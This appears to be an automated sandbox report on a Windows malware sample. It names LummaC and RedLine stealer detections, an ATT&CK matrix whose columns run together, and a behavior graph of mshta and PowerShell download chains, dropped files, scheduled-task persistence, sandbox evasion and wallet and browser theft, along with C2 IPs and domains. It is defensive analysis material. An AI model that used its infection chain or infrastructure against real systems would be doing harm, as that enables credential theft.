                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents
                            Source: Yara matchFile source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 28f48f066a.exe PID: 3640, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 8c36d696e4.exe PID: 1216, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 0dd40f41c4.exe PID: 3468, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: Process Memory Space: 28f48f066a.exe PID: 3640, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: Process Memory Space: 0dd40f41c4.exe PID: 3468, type: MEMORYSTR
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 8c36d696e4.exe PID: 1216, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00391204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00391204
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00391806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00391806

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		2
                            Valid Accounts                            		231
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            Exploitation for Privilege Escalation                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		14
                            Ingress Tool Transfer                            		Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomainsDefault Accounts11
                            Native API                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		21
                            Input Capture                            		1
                            Account Discovery                            		Remote Desktop Protocol31
                            Data from Local System                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter                            		2
                            Valid Accounts                            		2
                            Valid Accounts                            		4
                            Obfuscated Files or Information                            		Security Account Manager13
                            File and Directory Discovery                            		SMB/Windows Admin Shares1
                            Email Collection                            		11
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts11
                            Scheduled Task/Job                            		11
                            Scheduled Task/Job                            		21
                            Access Token Manipulation                            		12
                            Software Packing                            		NTDS3310
                            System Information Discovery                            		Distributed Component Object Model21
                            Input Capture                            		4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts2
                            PowerShell                            		1
                            Registry Run Keys / Startup Folder                            		12
                            Process Injection                            		1
                            Timestomp                            		LSA Secrets1291
                            Security Software Discovery                            		SSH3
                            Clipboard Data                            		125
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		Cached Domain Credentials671
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                            Registry Run Keys / Startup Folder                            		11
                            Masquerading                            		DCSync3
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                            Valid Accounts                            		Proc Filesystem11
                            Application Window Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt671
                            Virtualization/Sandbox Evasion                            		/etc/passwd and /etc/shadow1
                            System Owner/User Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                            Access Token Manipulation                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                            Process Injection                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                            Mshta                            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1604695 Sample: random.exe Startdate: 01/02/2025 Architecture: WINDOWS Score: 100 78 warlikedbeliev.org 2->78 80 rampnatleadk.click 2->80 82 3 other IPs or domains 2->82 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 26 other signatures 2->104 10 skotes.exe 2->10         started        15 random.exe 1 2->15         started        17 mshta.exe 1 2->17         started        19 skotes.exe 2->19         started        signatures3 process4 dnsIp5 94 185.215.113.43, 57262, 57263, 57265 WHOLESALECONNECTIONSNL Portugal 10->94 96 185.215.113.97, 57264, 57330, 80 WHOLESALECONNECTIONSNL Portugal 10->96 68 C:\Users\user\AppData\...\1e1a1f5243.exe, PE32 10->68 dropped 70 C:\Users\user\AppData\...\0dd40f41c4.exe, PE32 10->70 dropped 72 C:\Users\user\AppData\...\8c36d696e4.exe, PE32 10->72 dropped 76 5 other malicious files 10->76 dropped 158 Hides threads from debuggers 10->158 160 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->160 162 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->162 21 8c36d696e4.exe 10->21         started        26 28f48f066a.exe 10->26         started        28 0dd40f41c4.exe 10->28         started        74 C:\Users\user\AppData\Local\...\huS4b5Vj8.hta, HTML 15->74 dropped 164 Binary is likely a compiled AutoIt script file 15->164 166 Found API chain indicative of sandbox detection 15->166 168 Creates HTA files 15->168 30 mshta.exe 1 15->30         started        32 cmd.exe 1 15->32         started        170 Suspicious powershell command line found 17->170 172 Tries to download and execute files (via powershell) 17->172 34 powershell.exe 16 17->34         started        file6 signatures7 process8 dnsIp9 84 103.84.89.222, 33791, 57335, 57343 AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK Hong Kong 21->84 86 api.ip.sb.cdn.cloudflare.net 104.26.13.31, 443, 57340 CLOUDFLARENETUS United States 21->86 62 C:\Users\user\AppData\Local\...\tmp2E19.tmp, PE32 21->62 dropped 64 C:\Users\user\...\tmp2E19.tmp:Zone.Identifier, ASCII 21->64 dropped 114 Antivirus detection for dropped file 21->114 116 Multi AV Scanner detection for dropped file 21->116 118 Detected unpacking (changes PE section rights) 21->118 138 7 other signatures 21->138 36 conhost.exe 21->36         started        88 rampnatleadk.click 104.21.79.9, 443, 57266, 57267 CLOUDFLARENETUS United States 26->88 120 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->120 122 Query firmware table information (likely to detect VMs) 26->122 124 Machine Learning detection for dropped file 26->124 90 warlikedbeliev.org 172.67.181.203 CLOUDFLARENETUS United States 28->90 126 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->126 128 Tries to harvest and steal browser information (history, passwords, etc) 28->128 130 Tries to evade debugger and weak emulator (self modifying code) 28->130 132 Suspicious powershell command line found 30->132 134 Tries to download and execute files (via powershell) 30->134 38 powershell.exe 15 19 30->38         started        136 Uses schtasks.exe or at.exe to add and modify task schedules 32->136 43 conhost.exe 32->43         started        45 schtasks.exe 1 32->45         started        47 Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE 34->47         started        49 conhost.exe 34->49         started        file10 signatures11 process12 dnsIp13 92 185.215.113.16, 49709, 80 WHOLESALECONNECTIONSNL Portugal 38->92 66 Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE, PE32 38->66 dropped 140 Found many strings related to Crypto-Wallets (likely being stolen) 38->140 142 Powershell drops PE file 38->142 51 Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE 4 38->51         started        55 conhost.exe 38->55         started        144 Hides threads from debuggers 47->144 146 Tries to detect sandboxes / dynamic malware analysis system (registry check) 47->146 148 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 47->148 file14 signatures15 process16 file17 60 C:\Users\user\AppData\Local\...\skotes.exe, PE32 51->60 dropped 106 Antivirus detection for dropped file 51->106 108 Detected unpacking (changes PE section rights) 51->108 110 Machine Learning detection for dropped file 51->110 112 6 other signatures 51->112 57 skotes.exe 51->57         started        signatures18 process19 signatures20 150 Antivirus detection for dropped file 57->150 152 Detected unpacking (changes PE section rights) 57->152 154 Machine Learning detection for dropped file 57->154 156 5 other signatures 57->156

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.